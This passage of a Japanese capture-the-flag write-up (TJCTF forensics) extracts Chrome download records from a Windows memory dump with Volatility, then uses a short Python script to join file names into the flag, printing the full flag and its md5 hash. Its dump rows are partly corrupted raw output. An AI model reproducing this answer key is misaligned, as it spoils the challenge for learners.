    66 C:\Users\IEUser\Downloads\A7037                                                  C:\Users\IEUser\Downloads\A7037                                                  2018-08-06 03:27:44.603181         1018         1018     1      0         0 2018-08-06 03:27:44.946018      0 https://github.com/kakbkc/literate-sniffle/blob/master/A7037                           "b31939551b...56206d5d7"                                applicatio                                                       
    96 C:\Users\IEUser\Downloads\ED80D                                                  C:\Users\IEUser\Downloads\ED80D                                                  2018-08-06 03:30:52.983809         1045         1045     1      0         0 2018-08-06 03:30:53.237701      0 https://github.com/kakbkc/literate-sniffle/blob/master/ED80D                           "a25c27c64d...f231556ef"                                applicatio                                                       
    85 C:\Users\IEUser\Downloads\D2D9E                                                  C:\Users\IEUser\Downloads\D2D9E                                                  2018-08-06 03:29:47.513258         1005         1005     1      0         0 2018-08-06 03:29:47.814073      0 https://github.com/kakbkc/literate-sniffle/blob/master/D2D9E                           "5f76f11816...ebfc629d6"                                application/octet-stream         application/octet-stream        
    33 C:\Users\IEUser\Downloads\445CD                                                  C:\Users\IEUser\Downloads\445CD                                                  2018-08-06 03:23:31.638008         1035         1035     1      0         0 2018-08-06 03:23:31.946005      0 https://github.com/kakbkc/literate-sniffle/blob/master/445CD                           "9129c5d34c...1cea4d942"                                appl                                                             
    33 C:\Users\IEUser\Downloads\445CD                                                  C:\Users\IEUser\Downloads\445CD                                                  2018-08-06 03:23:31.638008         1035         1035     1      0         0 2018-08-06 03:23:31.946005      0 https://github.com/kakbkc/literate-sniffle/blob/master/445CD                           "9129c5d34c...1cea4d942"                                appl?                      €?      €?      €?            
    66 C:\Users\IEUser\Downloads\A7037                                                  C:\Users\IEUser\Downloads\A7037                                                  2018-08-06 03:27:44.603181         1018         1018     1      0         0 2018-08-06 03:27:44.946018      0 https://github.com/kakbkc/literate-sniffle/blob/master/A7037                           "b31939551b...56206d5d7"                                applicatioﾀ  ・・ﾀ  ・         ・ﾀ  ・・ﾀ  ・・ﾀ  ・        
    96 C:\Users\IEUser\Downloads\ED80D                                                  C:\Users\IEUser\Downloads\ED80D                                                  2018-08-06 03:30:52.983809         1045         1045     1      0         0 2018-08-06 03:30:53.237701      0 https://github.com/kakbkc/literate-sniffle/blob/master/ED80D                           "a25c27c64d...f231556ef"                                applicatioa.$.length-1?a         .Uw(a.$[b].Wr):a.Uw(a.$[        
$ volatility -f file_patched.dmp --profile=Win7SP1x86 chromedownloads --output=csv --output-file=chromedownloads.csv

Total Bytesは一部が1になっているのを除いて連番になっている。連番最終の1101のときにTarget Pathが7854}になっている。それぞれ順番につなげていけばいいのかもしれない。
重複しているものは1つのものとして結合し、2回結合することはしない。この連結させた結果を前に出てきたフラグの前半に結合させる。

def get_fname(s):
    return s[s.rfind('\\') + 1:]

with open('chromedownloads.csv', 'r') as f:
    lines = f.readlines()[1:]

d = {}
for line in lines:
    line = line.replace('\"', '').strip()
    target_path = line.split(',')[2]
    total_bytes = line.split(',')[5]
    #print get_fname(target_path), total_bytes
    if total_bytes != '1':
        d[total_bytes] = get_fname(target_path)

flag = 'tjctf{th1s_1s_n0t_a_v1ru5_'
for key, val in sorted(d.items()):
    flag += val

print flag

この結果は以下の通り。

tjctf{th1s_1s_n0t_a_v1ru5_D73C00EDD0C6F9FD2D9E80CBDBE1C494A699E87AAB38B7139DE0B284581C8042C968C5BA5571568EA70375603AF425A238823F6951FA712EEA8B0A9173830C113E76E08FBA833F47BE2CDB2DD8089A9206910445CDA7DFE792C18C4F4FE6B8AF4A560291E09832AC88112E8ED80D02F601D21850D6CF3FBC5CD90D6A89396172757E3F6A6DE516C94491CB1C0A3146C45AB85B669F38D4297BA58CC8B91792F1A51491867D3D0E8401319E8A4812F501F57E3CCD0FB71521B6BD86F3ACBB2E887181F0E71C20F32DC65BC5BEC8C1728BC391CEECF8530A3864C86B545F5ECDA182941F9C27CC11B53FB9865E7D2730A42B8A87854}

$ echo -n tjctf{th1s_1s_n0t_a_v1ru5_D73C00EDD0C6F9FD2D9E80CBDBE1C494A699E87AAB38B7139DE0B284581C8042C968C5BA5571568EA70375603AF425A238823F6951FA712EEA8B0A9173830C113E76E08FBA833F47BE2CDB2DD8089A9206910445CDA7DFE792C18C4F4FE6B8AF4A560291E09832AC88112E8ED80D02F601D21850D6CF3FBC5CD90D6A89396172757E3F6A6DE516C94491CB1C0A3146C45AB85B669F38D4297BA58CC8B91792F1A51491867D3D0E8401319E8A4812F501F57E3CCD0FB71521B6BD86F3ACBB2E887181F0E71C20F32DC65BC5BEC8C1728BC391CEECF8530A3864C86B545F5ECDA182941F9C27CC11B53FB9865E7D2730A42B8A87854} | md5sum
5f3edc3cc39b4771d3448fe20b5d6651  -

5f3edc3cc39b4771d3448fe20b5d6651